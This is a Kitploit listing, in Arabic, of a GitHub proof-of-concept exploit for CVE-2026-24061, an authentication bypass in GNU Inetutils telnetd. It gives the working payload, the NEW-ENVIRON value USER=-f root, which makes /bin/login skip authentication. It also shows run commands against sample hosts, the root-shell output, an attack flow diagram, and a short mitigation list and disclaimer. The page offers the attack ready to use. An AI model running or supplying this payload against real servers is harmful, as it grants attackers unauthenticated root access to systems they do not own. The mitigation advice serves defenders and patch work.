CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- — إثبات مفهوم لاستغلال تجاوز المصادقة في GNU Inetutils telnetd (CVE-2026-24061) والذي يفتح غلاف جذر عبر متغير USER المُعدّل في NEW-ENVIRON. | Kitploit
أدوات / GitHub / mbanyamer / cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell-
mbanyamer/cve-2026-24061-gnu-inetutils-telnetd-remote-authentication-bypass-root-shell- CVE-2026-24061-GNU-Inetutils-telnetd-Remote-Authentication-Bypass-Root-Shell- إثبات مفهوم لاستغلال تجاوز المصادقة في GNU Inetutils telnetd (CVE-2026-24061) والذي يفتح غلاف جذر عبر متغير USER المُعدّل في NEW-ENVIRON.
6 منذ 7 أشهراكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.
آخر 7 أيام آخر 30 يومًا
🧨 نظرة عامة
يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة تجاوز المصادقة عن بُعد في GNU Inetutils telnetd .
تنشأ المشكلة لأن telnetd لا يعقّم متغير البيئة USER المستلم عبر تفاوض Telnet NEW‑ENVIRON بشكل صحيح قبل استدعاء /bin/login.
من خلال توفير:
ينفّذ telnetd فعليًا:
مما يتجاوز المصادقة ويمنح جذر (root shell) فوريًا.
المنتج: GNU Inetutils telnetd
الإصدارات المتأثرة: ≤ 2.7
المنفذ: 23/TCP
المصادقة: غير مطلوبة
الأثر: تجاوز المصادقة ← جذر (Root Shell)
الصلاحيات: root
CVE: CVE‑2026‑24061
CVSS: 9.8 (حرجة)
⚙️ التفاصيل التقنية يتيح Telnet NEW‑ENVIRON للعملاء تعيين متغيرات البيئة أثناء تفاوض الجلسة.
يمرر telnetd الثغرة متغير USER مباشرة إلى login:
يخبر العلم -f برنامج login بـتخطي المصادقة ، مما يمنح وصولًا بصلاحيات الجذر.
📦 المتطلبات
Python 3
telnetlib (مكتبة قياسية)
هدف يعمل بنظام inetutils‑telnetd الثغرة ≤ 2.7
خدمة Telnet قابلة للوصول عبر TCP/23
لا توجد تبعيات خارجية مطلوبة.
🚀 الاستخدام
1️⃣ تشغيل الاستغلال python3 cve-2026-24061.py 192.168.1.100
2️⃣ منفذ اختياري python3 cve-2026-24061.py example.com 23
3️⃣ النتيجة المتوقعة # id
uid=0(root) gid=0(root)
#
لديك الآن جذر تفاعلي (root shell).
🧪 مثال python3 cve-2026-24061.py 10.10.10.20
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
🧯 ملاحظات
الاستغلال فوري
لا حاجة لتجربة القوة الغاشمة
لا حاجة لبيانات اعتماد
لوحظ استغلاله في البرية
يعمل على تثبيتات Debian/Ubuntu الافتراضية لـ inetutils‑telnetd
يفشل إذا تم تصحيح telnetd أو استبداله (مثل OpenBSD telnetd)
🛡️ التخفيف
ترقية GNU Inetutils ≥ 2.8
تعطيل خدمة telnet
الاستبدال بـ SSH
حظر TCP/23 في جدار الحماية
تدقيق حزم inetutils‑telnetd
📊 مخطط تدفق هجوم PoC sequenceDiagram
participant A as Attacker
participant T as Target telnetd
participant L as /bin/login
participant R as Root Shell
A->>T: Connect TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Execute /bin/login -f root
L-->>T: Auth bypass success
T-->>R: Spawn root shell
R-->>A: Interactive root session
⚠️ إخلاء مسؤولية يُقدَّم هذا الاستغلال للأغراض التالية:
البحث الأمني
اختبار الاختراق المصرح به
التحقق الدفاعي
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها غير قانوني.